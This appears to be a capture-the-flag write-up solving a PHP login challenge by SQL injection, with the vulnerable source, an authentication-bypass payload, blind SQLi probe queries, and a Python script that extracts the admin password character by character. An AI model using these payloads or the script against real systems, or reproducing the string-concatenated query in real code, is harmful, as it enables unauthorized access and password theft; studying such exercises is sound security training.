## Flag

FLAG_KpWa4ji3uZk6TrPK

## First step was quite easy. I sent SQLi query in input form.

admin' or 'a' = 'a

## Hint revealed

-------Source code of "index.php"--------------

Congratulations!
It's too easy?
Don't worry.
The flag is admin's password.

Hint:
<?php
    function h($s){return htmlspecialchars($s,ENT_QUOTES,'UTF-8');}
    
    $id = isset($_POST['id']) ? $_POST['id'] : '';
    $pass = isset($_POST['pass']) ? $_POST['pass'] : '';
    $login = false;
    $err = '';
    
    if ($id!=='')
    {
        $db = new PDO('sqlite:database.db');
        $r = $db->query("SELECT * FROM user WHERE id='$id' AND pass='$pass'");
        $login = $r && $r->fetch();
        if (!$login)
            $err = 'Login Failed';
    }
?><!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>q6q6q6q6q6q6q6q6q6q6q6q6q6q6q6q6</title>
  </head>
  <body>
    <?php if (!$login) { ?>
    <p>
      First, login as "admin".
    </p>
    <div style="font-weight:bold; color:red">
      <?php echo h($err); ?>
    </div>
    <form method="POST">
      <div>ID: <input type="text" name="id" value="<?php echo h($id); ?>"></div>
      <div>Pass: <input type="text" name="pass" value="<?php echo h($pass); ?>"></div>
      <div><input type="submit"></div>
    </form>
    <?php } else { ?>
    <p>
      Congratulations!<br>
      It's too easy?<br>
      Don't worry.<br>
      The flag is admin's password.<br>
      <br>
      Hint:<br>
    </p>
    <pre><?php echo h(file_get_contents('index.php')); ?></pre>
    <?php } ?>
  </body>
</html>

-------------------------------------------------

## I somehow have to get the admin's password from DB.
Code does not output any data in DB.
Code does two things. If the login fail, it will say "Login Failed". 
If the login success, it will say "Congratulations!"

## I can use blind SQL injection!

## As a test, I sent below queries.

------------------------------------------------------------

admin' and substr((select pass from user), 1, 1) = 'F' --
admin' and substr((select pass from user), 2, 1) = 'L' --
admin' and substr((select pass from user), 3, 1) = 'A' --
admin' and substr((select pass from user), 4, 1) = 'G' --
admin' and substr((select pass from user), 5, 1) = '_' --

------------------------------------------------------------

What does this query do?
Take one character from admin's password and compare with given value (In this case, "F, L, A, G, _").
If the both value matches, response will be "Congratulations!"
If not, response will be "Login Failed"

## All queries were successful which means that the first 5 character of the flag is "FLAG_"
## According to the historical problems, I already know that flag contains 21 characters.
## So I have to get remaining 16 characters.
## It will be painful to send queries manually so I wrote python script to automate the requests.

---------------Python script-----------------------------------

## This script is slow. Took me more than hour to get the flag.

import urllib
import urllib2

url = 'http://ctfq.sweetduet.info:10080/~q6/index.php'

## I already know that the first five characters of flag is "FLAG_"
## So start with 6th characters

offset = 6
flag = ''
code = 33

while len(flag) < 16:
	data = urllib.urlencode({"id":"admin' and substr((select pass from user), " + str(offset) + ", 1) = " + chr(39) + chr(code) + chr(39) + " --"})
	req = urllib2.Request(url, data)
	res = urllib2.urlopen(req)
	response = res.read()
	if 'Congratulations!' in response:
		flag += chr(code)
		offset += 1
		code = 33 ## Reset ascii. Back to the beginning
		print('Progress: ' + str(flag))
	else:
		code += 1
		
print('Flag is: FLAG_' + str(flag))

--------------------------------------------------------------

# python blindSQL.py 
Progress: K
Progress: Kp
Progress: KpW
Progress: KpWa
Progress: KpWa4
Progress: KpWa4j
Progress: KpWa4ji
Progress: KpWa4ji3
Progress: KpWa4ji3u
Progress: KpWa4ji3uZ
Progress: KpWa4ji3uZk
Progress: KpWa4ji3uZk6
Progress: KpWa4ji3uZk6T
Progress: KpWa4ji3uZk6Tr
Progress: KpWa4ji3uZk6TrP
Progress: KpWa4ji3uZk6TrPK
Flag is: FLAG_KpWa4ji3uZk6TrPK